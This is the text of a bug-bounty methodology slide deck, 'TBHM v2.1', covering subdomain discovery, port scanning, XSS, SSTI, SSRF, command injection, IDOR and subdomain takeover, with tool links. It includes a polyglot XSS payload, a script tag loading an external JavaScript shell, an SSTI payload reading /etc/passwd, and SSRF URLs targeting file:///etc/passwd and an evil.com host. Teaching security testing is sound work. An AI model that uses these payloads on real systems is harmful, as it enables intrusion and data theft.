TBHM2.1 (P)
Methodology v2.1
whoami
Hack
Stuff
Better
(and practically)
And... LOTS of memes... only some are funny
history && topics
Aka “How to Shot Web” @ DEFCON23
★ philosophy shifts
★ discovery techniques
★ mapping methodology
★ parameters oft attacked
★ useful fuzz strings
★ bypass or filter evasion techniques
★ new/awesome tooling
★ memes
Topics covered before:
★ Subdomain & Discovery
★ SQLi
★ XSS
★ File Uploads
★ CSRF
★ Privilege, Auth, IDOR
v2
★ MOAR discovery
★ xss
★ ssti
★ ssrf
★ Code Inj / cmdi / advancements in fuzzing
★ Infrastructure and config
★ WAF
★ SOAP Testing
light reading
Discovering New Targets
Discovery
Sublist3r
★ Plazmaz fork
★ Fleetcaptain fork
Sub Scraping
★ ThreatCrowd, Virustotal
★ Cloudflare
★ Censys.io
★ Haven't tested but love the ideas
Sub Bruting
★ all.txt
https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
Acquisitions
★ Crunchbase
★ wikipedia
Port Scanning
65536 unverified hosts (a large target's ASN)
Tool | Time to run | Found
nmap | zzz... ∞ |
Interlude... credential bruteforce
Brutespray: Nmap service scan (-oG) / masscan → credential bruteforce
https://github.com/x90skysn3k/brutespray
★ Gobuster
★ Burp content discovery
★ Robots disallowed
★ ¯\_(ツ)_/¯
CommonSpeak and Scans.io data
★ Subdomain data is awesome
Parameter Bruting?
★ Yep! - Untested but love the idea
★ Can be combined with Backslash Powered Scanner, top 2500 Alexa params
Discovery flow:
Domain → Identify IPs and ASNs (Reverse Whois, Acquisitions) → Domain bruteforcing, scraping for main TLDs (enumall, Massdns, sublist3r) → Resolve && add discovered TLDs, new IP ranges → Portscan (masscan) → Visual Identification (eyewitness, Manual)
1: Jamie: I really enjoy my super admin access this morning !!!
2: Frans: I really enjoy my NEW super admin access this morning !!! “><script src=//y.vg></script>
3: Y.vg is a javascript shell
4: XSSHunter
XSSHunter
Payload:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Jackmasa’s XSS Mindmap
https://github.com/jhaddix/XSS.png
Server Side Template Injection
SSTI
TBHMv1
❏ Nothing
1: https://acme.com/errorpage{{2*3}}
2: https://acme.com/errorpage{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
SSTI Tooling
Server Side Template Injection & Logic / Debug parameters
★ preview
★ redirect
★ id
★ view
★ activity
★ name
http://acme.com/script?name={{2*3}}
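As an added illustration (not code from the slides) of why the {{2*3}} probe works: a constructed toy template engine standing in for Jinja2-style engines, with the vulnerable render-the-user-input pattern next to the fixed one and the triage check applied to the response. The engine, error_page_vulnerable, error_page_safe and probe_evaluated are hypothetical names invented here.

```python
import ast
import operator
import re

# Constructed toy template engine (not Jinja2): text inside {{ ... }} is looked up
# in the render context, otherwise parsed as a whitelisted arithmetic expression.
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}
_TAG = re.compile(r"\{\{(.*?)\}\}")


def _eval_arith(src):
    """Evaluate numbers combined with + - * only; anything else is rejected."""
    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError("unsupported template expression: %r" % src)
    return walk(ast.parse(src, mode="eval").body)


def render(template, **context):
    """Expand every {{ tag }}: context variables by name, else evaluate."""
    def expand(match):
        expr = match.group(1).strip()
        if expr in context:
            return str(context[expr])   # values are never re-parsed as template
        return str(_eval_arith(expr))
    return _TAG.sub(expand, template)


def error_page_vulnerable(path):
    """Anti-pattern behind the slide's probe: user input becomes template source."""
    try:
        return render("Page not found: " + path)
    except (ValueError, SyntaxError):
        return "Template error"   # error-based tells are an SSTI signal too


def error_page_safe(path):
    """Fix: the template is a constant; the request path is only a context value."""
    return render("Page not found: {{ path }}", path=path)


def probe_evaluated(body, probe="{{2*3}}", expected="6"):
    """Triage check: the engine evaluated the probe if the arithmetic result
    appears in the response and the literal probe text does not."""
    return expected in body and probe not in body
```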
Server Side Request Forgery
TBHMv1
❏ Nothing
❏ Well kinda... SSRF
SSRF Common Parameters or Injection points from TBHMv1
★ Where? file= folder= location= style=
★ Resources
○ SSRF Bible (black magic)
http://ACME.com/redirect.php?url=file:///etc/passwd
http://acme.com/ssrf.php?url=tftp://evil.com:12346/TESTPACKET
SSRF Resources
★ protocol and schema mappings
★ Exploit examples
Server Side Request Forgery
Parameters and how they are typically checked:
★ dest {regex + perm}
★ redirect {regex}
★ uri {regex + perm}
★ path {regex}
★ port {regex}
http://acme.com/script?uri=ftp://site
Code Inj, CMDi, & Future Fuzzing, ++
Code Injection + CMD Injection + New Fuzzing
TBHMv1
❏ Sqli
❏ Polyglot
❏ Seclists
❏ Sqlmap
❏ Params
❏ Tooling
❏ resources
★ Commix
○ CMDi
○ Supports php code inj
★ Unknown Identification
○ Backslash Powered Scanner
★ resources
○ albinowax (James Kettle)
IDOR - MFLAC
★ IDs
★ Hashes
★ Emails
Insecure Direct Object Reference
http://acme.com/script?user=21856
Code Injection + CMD Injection
★ Commix pros
○ Command injection
○ Supports php code inj
○ Custom modules
○ PS & PY shells
○ Put many memes in their slides
Backslash Powered Scanner
★ Generic payloads for any stack
○ Send a ' and get an error
○ Send a \' and the backslash escapes your injection character
★ Multi-tiered, Simple, and effective response analyzing
○ Response code
○ Response size
○ keywords
★ Watch the video then read the paper =)
○ https://broadcast.comdi.com/r7rwcspee75eewbu8a0f
○ http://blog.portswigger.net/2016/11/backslash-powered-scanning-hunting.html
Infrastructure & Config
Subdomain takeover!
★ Dev.domain.com
★ Stage.domain.com
★ ww1/ww2/ww3...domain.com
★ www.domain.uk/jp/...
★ ...
★ https://twitter.com/Jhaddix/status/964714566910279680
SOAP Services
Bespoke .nfo
resources!
Resources
★ Pivoting from blind SSRF to RCE with HashiCorp Consul - Peter Adkins - http://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html
★ OWASP SSTI Workshop - Gérôme Dieu - https://speakerdeck.com/owaspmontreal/workshop-server-side-template-injection-ssti
Hi Pete!
★ Rails Dynamic Render to RCE (CVE-2016-0752) - John Poulin - https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/
Links
aboul3la https://github.com/aboul3la/Sublist3r
jhaddix https://github.com/jhaddix/domain
blechschmidt https://github.com/blechschmidt/massdns
robertdavidgraham https://github.com/robertdavidgraham/masscan
anshumanbh https://github.com/anshumanbh/brutesubs
OJ Reeves https://github.com/OJ/gobuster
epinna https://github.com/epinna/tplmap
https://github.com/mak-/parameth
https://gist.github.com/anshumanbh/96a0b81dfe318e9e956013209e178fa9
https://github.com/ChrisTruncer/EyeWitness
https://github.com/jackmasa/XSS.png
https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
https://github.com/lorenzog/dns-parallel-prober
SSRF Bible https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit#
https://github.com/ewilded/psychoPATH
https://github.com/commixproject/commix
https://github.com/qazbnm456/awesome-web-security
https://github.com/infoslack/awesome-web-hacking
https://github.com/djadmin/awesome-bug-bounty
Jason Haddix - @jhaddix